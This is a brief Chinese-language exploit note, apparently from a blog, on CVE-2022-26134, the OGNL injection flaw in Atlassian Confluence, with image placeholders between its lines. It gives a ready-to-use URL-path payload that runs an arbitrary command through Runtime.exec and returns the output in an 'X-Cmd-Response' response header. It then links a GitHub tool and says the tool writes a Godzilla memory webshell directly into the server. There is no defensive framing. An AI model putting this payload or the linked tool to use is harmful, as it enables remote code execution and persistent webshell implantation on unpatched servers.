image-20220616154452055

1
/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/

image-20220616100405049

https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

使用此工具直接写入内存马

image-20220616100919933